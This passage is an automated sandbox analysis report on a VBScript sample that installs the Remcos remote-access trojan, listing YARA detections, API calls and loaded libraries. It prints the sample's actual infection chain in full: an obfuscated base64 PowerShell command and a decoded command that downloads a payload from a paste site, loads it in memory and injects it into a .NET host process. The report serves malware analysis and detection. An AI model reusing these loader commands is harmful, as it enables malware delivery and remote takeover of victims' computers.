                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434801 appears 41 times
                    Source: asegurar.vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2620
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: asegurar.vbsReversingLabs: Detection: 15%
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a
?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
